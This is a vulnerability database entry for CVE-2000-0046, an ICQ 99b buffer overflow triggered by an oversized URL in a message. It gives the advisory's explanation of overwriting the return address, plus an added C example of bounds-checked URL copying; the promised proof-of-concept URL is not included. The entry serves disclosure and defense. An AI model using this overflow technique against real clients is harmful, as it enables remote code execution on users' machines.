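ICQ URL Remote Buffer Overflow Vulnerability
Vulnerability ID | 1105718 | Vulnerability type | Buffer overflow |
Published | 2000-01-12 | Updated | 2005-10-20 |
CVE ID | CVE-2000-0046 |
CNNVD-ID | CNNVD-200001-028 |
Affected platform | Windows | CVSS score | 7.5 |
|Vulnerability source
|Vulnerability details
The ICQ 99b 1.1.1.1 client contains a buffer overflow vulnerability. A remote attacker can execute commands by means of a malformed URL in an ICQ message.
|Exploit (EXP)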
source: http://www.securityfocus.com/bid/929/info
ICQ is an individual-to-individual chat network with clients installed on millions of computers around the world. It is, by far, the most widely used, and it is vulnerable to a remote buffer overflow. When the Mirabilis ICQ client parses a URL received from another user _inside of a message_, it does not perform bounds checking on the length of the URL. Because of this, it is possible to overwrite the EIP ("instruction pointer", or return address, that was pushed onto the stack when the offending function was first called) and execute arbitrary and possibly malicious code stuffed inside the oversized URL on the target host once the URL is clicked on.
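The missing length check described above, as an added C example (not code from the advisory or from the ICQ client): a hypothetical `extract_url` helper measures the URL token in a message before copying it and rejects anything that does not fit. The 256-byte `URL_BUF_SIZE` and all function names are assumptions; the page does not state the client's real buffer size.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed buffer size; the real client's buffer size is not given on the page. */
#define URL_BUF_SIZE 256

/* Unchecked pattern the advisory describes (kept as a comment only):
 *     char url[URL_BUF_SIZE];
 *     strcpy(url, start);      // copy length is chosen by the sender
 */

/* Hypothetical helper: find the first http:// URL in msg and copy it to out.
 * Returns 0 on success, -1 if there is no URL or the arguments are invalid,
 * and -2 if the URL does not fit in out (including the terminating NUL). */
int extract_url(const char *msg, char *out, size_t out_size)
{
    const char *start;
    size_t len;

    if (msg == NULL || out == NULL || out_size == 0)
        return -1;
    out[0] = '\0';                       /* never leave stale data behind */

    start = strstr(msg, "http://");
    if (start == NULL)
        return -1;

    len = strcspn(start, " \t\r\n");     /* URL token ends at whitespace or NUL */
    if (len >= out_size)                 /* reject: truncating would change the target */
        return -2;

    memcpy(out, start, len);
    out[len] = '\0';
    return 0;
}

int main(void)
{
    char url[URL_BUF_SIZE];
    char big[1100] = "http://example.test/?";   /* constructed oversized input */

    memset(big + strlen(big), 'A', 1000);       /* remaining bytes stay NUL */
    printf("normal:    %d\n", extract_url("hi http://example.test/x ok", url, sizeof url));
    printf("oversized: %d\n", extract_url(big, url, sizeof url));
    return 0;
}
```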
Sending the following URL (with no line breaks) in a regular message to a user will cause their ICQ to crash (just a basic proof of concept, no real malicious exploit code included here) if they click on it:
|References
Source: BID
Name: 929
Link: http://www.securityfocus.com/bid/929